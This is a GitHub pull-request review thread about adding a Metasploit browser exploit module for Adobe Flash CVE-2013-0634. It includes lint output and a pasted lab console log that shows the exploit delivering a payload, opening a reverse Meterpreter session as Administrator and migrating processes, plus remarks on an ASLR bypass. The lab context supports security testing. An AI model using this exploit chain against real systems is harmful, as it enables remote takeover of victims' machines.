Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption

[dukebarman]

Add exploit for 2013-0634. PoC video - http://www.youtube.com/watch?v=kuaofEQ5liA

[wchen-r7]

Thanks @dukebarman. We need the source of your swf file. Please place it under external/source/exploits as a new directory, thanks again.

[wchen-r7]

Module needs to use the BrowserExploitServer mixin. Please see:
https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer

[wchen-r7]

Noted. Thanks!

[jvazquez-r7]

I'm going to give a chance to this pull request today.

[jvazquez-r7]

The ruby code isn't msftidy compliant. That should be fixed:

$ tools/msftidy.rb modules/exploits/windows/browser/adobe_flash_regex_value.rb 
modules/exploits/windows/browser/adobe_flash_regex_value.rb - [WARNING] Module should not be marked executable
modules/exploits/windows/browser/adobe_flash_regex_value.rb:1 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:2 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:3 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:4 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:5 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:6 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:7 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:8 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:9 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:10 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:11 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:12 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:13 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:14 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:15 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:16 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:17 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:18 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:19 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:20 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:21 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:22 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:23 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:24 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:25 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:26 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:27 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:28 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:29 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:30 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:31 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:32 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:33 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:34 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:35 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:36 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:37 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:38 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:39 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:40 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:41 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:42 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:43 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:44 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:45 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:46 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:47 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:48 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:49 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:50 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:51 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:52 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:53 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:54 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:55 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:56 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:57 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:58 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:59 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:60 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:61 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:62 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:63 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:64 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:65 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:66 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:67 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:68 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:69 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:70 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:71 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:72 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:73 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:74 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:75 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:76 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:77 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:78 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:79 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:80 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:81 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:82 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:83 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:84 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:85 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:86 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:87 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:88 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:89 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:90 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:91 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:92 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:93 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:94 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:95 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:96 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:97 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:98 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:99 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:100 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:101 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:102 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:103 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:104 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:105 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:106 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:107 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:108 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:109 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:110 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:111 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:112 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:113 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:114 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:115 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:116 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:117 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:118 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:119 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:120 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:121 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:122 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:123 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:124 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:125 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:126 - [WARNING] Carriage return EOL

[todb]

These EOL errors tend to come from writing text files in Windows. You'll
want to convert this to a proper POSIX end of line format, otherwise the
formatting looks all silly.

[jvazquez-r7]

just for the author interest: I'm currently working in the ActionScript review atm, will update with more feedback once review is finished!

[jvazquez-r7]

I had to change the filename to pia.as in order to easily compile with mxmlc.

After that, pia.as compiled easily, and it's working on IE6 / Flash 11.5.502.110:

msf exploit(adobe_flash_regex_value) > rexploit
[*] Stopping existing job...
[*] Server stopped.
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://192.168.172.1:8080/trbMH5OZWjQ
[*] Server started.
msf exploit(adobe_flash_regex_value) > [*] 192.168.172.244  adobe_flash_regex_value - Gathering target information.
[*] 192.168.172.244  adobe_flash_regex_value - request: /trbMH5OZWjQ/CypsHQ/
[*] 192.168.172.244  adobe_flash_regex_value - Sending HTML
[*] 192.168.172.244  adobe_flash_regex_value - request: /trbMH5OZWjQ/CypsHQ/Main.swf
[*] 192.168.172.244  adobe_flash_regex_value - Sending SWF
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1172) at 2014-04-16 09:57:49 -0500
[*] Session ID 1 (192.168.172.1:4444 -> 192.168.172.244:1172) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (1076)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3272
[+] Successfully migrated to process 

msf exploit(adobe_flash_regex_value) > sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  JUAN-C0DE875735\Administrator @ JUAN-C0DE875735  192.168.172.1:4444 -> 192.168.172.244:1172 (192.168.172.244)

msf exploit(adobe_flash_regex_value) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 1 closed.  Reason: User exit

I continue working on it, more feedback will be coming.

[dukebarman]

Thanks! I tested on IE8 + Windows XP

[jvazquez-r7]

@dukebarman cool, I've deobfuscated and cleaned the AS, I'm cleaning everything and landing in a while, thanks a lot for porting it as a msf module :) kinda nice work :) landing is coming, just let me finish things :)

[jvazquez-r7]

Landed, thanks @dukebarman, see final landing here: b0e4648

Helped deofuscating the AS, adding support for Win7 SP1 (without MS13-063!!! since it kills the technique used for ASLR bypass), and fixing a little bit the ruby code. Hope you like :-)

btw, just tested with 11.5 versions but prolly it can works in older versions of Flash as is, or with minor tweaking, I hadn't time to test. Also bypass ASLR on win7sp1 with MS13-063 should be feasible :) hadn't time neither to finish it! Maybe in the near future :)

Thanks a lot @dukebarman for an awesome contrib!